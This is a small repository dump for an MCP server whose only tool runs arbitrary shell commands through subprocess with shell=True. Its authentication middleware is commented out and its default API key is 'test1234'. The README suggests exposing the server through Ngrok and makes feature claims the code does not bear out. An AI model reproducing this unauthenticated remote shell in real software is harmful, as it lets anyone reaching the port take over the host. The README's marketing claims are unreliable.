# Directory Structure
```
├── .dockerignore
├── .vscode
│   └── launch.json
├── docker-compose.yml
├── Dockerfile
├── Dockerfile.ubuntu
├── LICENSE
├── main.py
├── README.md
├── requirements.txt
└── scripts
    └── build.sh
```
# Files
--------------------------------------------------------------------------------
/.dockerignore:
--------------------------------------------------------------------------------
```
1 | __pycache__/
2 | *.py[cod]
3 | *$py.class
4 | *.so
5 | .git/
6 | .github/
7 | .gitignore
8 | .vscode/
9 | .env
10 | .pytest_cache/
11 | .coverage
12 | htmlcov/
13 | scripts/
14 | Docker*
15 | docker-compose.yml
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
```markdown
1 | # MCP Serve: A Powerful Server for Deep Learning Models
2 |
3 | Welcome to the MCP Serve repository, a tool designed for running Deep Learning models effortlessly. With a simple yet effective MCP Server that supports shell execution, local tunneling via Ngrok, and hosting an Ubuntu24 container with Docker, this repository is a must-have for any AI enthusiast!
4 |
5 | ## Features 🚀
6 |
7 | 🔹 **Simple MCP Server**: Easily launch your Deep Learning models and serve them using the MCP Server.
8 | 🔹 **Shell Execution**: Execute commands directly from the server shell for maximum control.
9 | 🔹 **Ngrok Connectivity**: Connect to your local server via Ngrok for seamless access from anywhere.
10 | 🔹 **Ubuntu24 Container Hosting**: Utilize Docker to host an Ubuntu24 container for a stable environment.
11 | 🔹 **Cutting-Edge Technologies**: Designed with Anthropic, Gemini, LangChain, and more top-notch technologies.
12 | 🔹 **Support for ModelContextProtocol**: Ensuring seamless integration with various Deep Learning models.
13 | 🔹 **OpenAI Integration**: Connect effortlessly with OpenAI for advanced AI capabilities.
14 |
15 | ## Repository Topics 📋
16 |
17 | ✨ anthropic, claude, container, deepseek, docker, gemini, langchain, langgraph, mcp, modelcontextprotocol, ngrok, openai, sonnet, ubuntu, vibecoding
18 |
19 | ## Download App 📦
20 |
21 | [Download the latest release](https://github.com/mark-oori/mcpserve/releases)
22 |
23 | Download the latest release from the link above, then launch it and start exploring the possibilities!
24 |
25 | ## Getting Started 🏁
26 |
27 | To get started with MCP Serve, follow these simple steps:
28 |
29 | 1. **Clone the Repository**: `git clone https://github.com/mark-oori/mcpserve.git`
30 | 2. **Install Dependencies**: `pip install -r requirements.txt`
31 | 3. **Launch the MCP Server**: `python main.py`
32 |
33 | ## Contributing 🤝
34 |
35 | We welcome contributions to make MCP Serve even more robust and feature-rich. Feel free to fork the repository, make your changes, and submit a pull request.
36 |
37 | ## Community 🌟
38 |
39 | Join our community of AI enthusiasts, developers, and researchers to discuss the latest trends in Deep Learning, AI frameworks, and more. Share your projects, ask questions, and collaborate with like-minded individuals.
40 |
41 | ## Support ℹ️
42 |
43 | If you encounter any issues with MCP Serve or have any questions, please check the "Issues" section of the repository or reach out to our support team for assistance.
44 |
45 | ## License 📜
46 |
47 | This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
48 |
49 | ---
50 |
51 | Dive into the world of Deep Learning with MCP Serve and revolutionize the way you interact with AI models. Whether you're a seasoned AI professional or a beginner exploring the possibilities of AI, MCP Serve has something for everyone. Start your Deep Learning journey today! 🌌
52 |
53 | 
54 |
55 | Happy coding! 💻🤖
```
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
```
1 | langchain-mcp-adapters
2 | httpx
3 | python-dotenv
```
--------------------------------------------------------------------------------
/docker-compose.yml:
--------------------------------------------------------------------------------
```yaml
1 | version: '3'
2 |
3 | services:
4 |   mcp:
5 |     container_name: mcp
6 |     build: .
7 |     ports:
8 |       - "8005:8005"
9 |     environment:
10 |       # - MCP_API_KEY=${MCP_API_KEY:-test1234} # Not ready yet; needs updates to the mcp library. Can be set manually for now.
11 |       - FASTMCP_DEBUG=true
12 |       - FASTMCP_LOG_LEVEL=DEBUG
13 |     volumes:
14 |       - .:/app
15 |     restart: unless-stopped
```
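Since `main.py` loads a `.env` file via `python-dotenv`, the compose setup can be driven by a local env file. A sample `.env` sketch — every value below is just the illustrative default taken from `main.py`, not a file shipped with the repository:

```
APP_NAME=Terminal
APP_DEBUG=true
APP_LOG_LEVEL=DEBUG
APP_PORT=8005
MCP_API_KEY=test1234
```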
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
```dockerfile
1 | # Small python 3.11 docker file
2 | FROM python:3.11-slim
3 |
4 | # Set working directory
5 | WORKDIR /app
6 |
7 | # Set environment variables
8 | ENV PYTHONDONTWRITEBYTECODE=1
9 | ENV PYTHONUNBUFFERED=1
10 |
11 | # Install dependencies
12 | COPY requirements.txt .
13 | RUN pip install --no-cache-dir --upgrade pip && \
14 |     pip install --no-cache-dir uv && \
15 |     uv pip install --system --no-cache-dir -r requirements.txt
16 |
17 | # Copy application code
18 | COPY . .
19 |
20 | # Expose port
21 | EXPOSE 8005
22 |
23 | # Run the application
24 | CMD ["python", "main.py"]
25 |
```
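The image can also be built and run directly, without compose; the `mcpserve` tag below is illustrative, and the published port matches the `EXPOSE 8005` above:

```shell
# Build the image, then run it with the server port published
docker build -t mcpserve .
docker run --rm -p 8005:8005 mcpserve
```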
--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------
```json
1 | {
2 |     "version": "0.2.0",
3 |     "configurations": [
4 |         {
5 |             "name": "Python: MCP Server",
6 |             "type": "debugpy",
7 |             "request": "launch",
8 |             "program": "${workspaceFolder}/main.py",
9 |             "console": "integratedTerminal",
10 |             "justMyCode": false,
11 |             "env": {
12 |                 "PYTHONPATH": "${workspaceFolder}",
13 |                 "FASTMCP_DEBUG": "true",
14 |                 "FASTMCP_LOG_LEVEL": "DEBUG"
15 |             }
16 |         }
17 |     ]
18 | }
19 |
```
--------------------------------------------------------------------------------
/scripts/build.sh:
--------------------------------------------------------------------------------
```bash
1 | #!/bin/bash
2 |
3 | SHORT_SHA=$(git rev-parse --short HEAD)
4 |
5 | # Set TAG to first argument if provided, otherwise use SHORT_SHA
6 | TAG=${1:-$SHORT_SHA}
7 |
8 | ########################################################################
9 | ## Container Registry
10 | ########################################################################
11 | # Define the image naming parameters
12 | REPOSITORY="ryaneggz" # Docker Hub namespace (username)
13 | PROJECT_ID="mcpserve" # Image name
14 | 
15 | # Build and tag the Docker image (--squash requires Docker's experimental mode)
16 | docker build --squash -t "$REPOSITORY/$PROJECT_ID:$TAG" .
17 | docker tag "$REPOSITORY/$PROJECT_ID:$TAG" "$REPOSITORY/$PROJECT_ID:latest"
18 |
19 | ########################################################################
20 | ## Docker Hub
21 | ########################################################################
22 | echo ""
23 | ## Prompt to push the image to Docker Hub
24 | echo "Do you want to push the image to Docker Hub? (y/n)"
25 | read -r response
26 | if [[ $response =~ ^([yY][eE][sS]|[yY])$ ]]
27 | then
28 |     docker push "$REPOSITORY/$PROJECT_ID:$TAG"
29 |     docker push "$REPOSITORY/$PROJECT_ID:latest"
30 | fi
31 |
```
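The `TAG=${1:-$SHORT_SHA}` line in `build.sh` relies on shell parameter expansion: the first positional argument wins, and the short commit SHA is the fallback. A standalone sketch (the SHA value here is a stand-in, since no git repository is assumed):

```shell
# Fallback tag selection, as in build.sh
short_sha="abc1234"    # stand-in for $(git rev-parse --short HEAD)
tag=${1:-$short_sha}   # use the first CLI argument if given, else the SHA
echo "$tag"
```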
--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
```python
1 | # mcp/main.py
2 | import os
3 | import subprocess
4 | from mcp.server.fastmcp import FastMCP
5 | from starlette.exceptions import HTTPException
6 | from dotenv import load_dotenv
7 | 
8 | # Load environment variables from .env file
9 | load_dotenv()
10 | 
11 | # Server configuration (environment variables are strings, so coerce types)
12 | APP_NAME = os.getenv("APP_NAME", "Terminal")
13 | APP_DEBUG = os.getenv("APP_DEBUG", "true").lower() == "true"
14 | APP_LOG_LEVEL = os.getenv("APP_LOG_LEVEL", "DEBUG")
15 | APP_PORT = int(os.getenv("APP_PORT", "8005"))
16 | MCP_API_KEY = os.getenv("MCP_API_KEY", "test1234")
17 | 
18 | # Middleware function to check API key authentication
19 | def middleware(request):
20 |     # Verify the x-api-key header matches the environment variable
21 |     if request.headers.get("x-api-key") != MCP_API_KEY:
22 |         raise HTTPException(status_code=401, detail="Unauthorized")
23 | 
24 | # Server configuration settings
25 | settings = {
26 |     'debug': APP_DEBUG,          # Enable debug mode
27 |     'port': APP_PORT,            # Port to run server on
28 |     'log_level': APP_LOG_LEVEL,  # Logging verbosity
29 |     # 'middleware': middleware,  # Authentication middleware (pending mcp library support)
30 | }
31 | 
32 | # Initialize FastMCP server instance
33 | mcp = FastMCP(name=APP_NAME, **settings)
34 | 
35 | @mcp.tool()
36 | async def shell_command(command: str) -> str:
37 |     """Execute a shell command and return its output."""
38 |     return subprocess.check_output(command, shell=True).decode()
39 | 
40 | if __name__ == "__main__":
41 |     print(f"Starting MCP server... {APP_NAME} on port {APP_PORT}")
42 |     # Start server with Server-Sent Events transport
43 |     mcp.run(transport="sse")
```
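The `shell_command` tool is a thin wrapper over `subprocess.check_output`; the standalone sketch below shows the same call and its failure mode (the `run_shell` helper name is ours, not part of the server):

```python
import subprocess

def run_shell(command: str) -> str:
    # Same call shell_command makes: run the string through the shell,
    # return stdout as text, raise CalledProcessError on a non-zero exit
    return subprocess.check_output(command, shell=True).decode()

print(run_shell("echo hello").strip())  # prints "hello"
```

Note that because the authentication middleware in `main.py` is commented out, anyone who can reach port 8005 can execute arbitrary shell commands; keep the server on a trusted network until the API-key check is wired in.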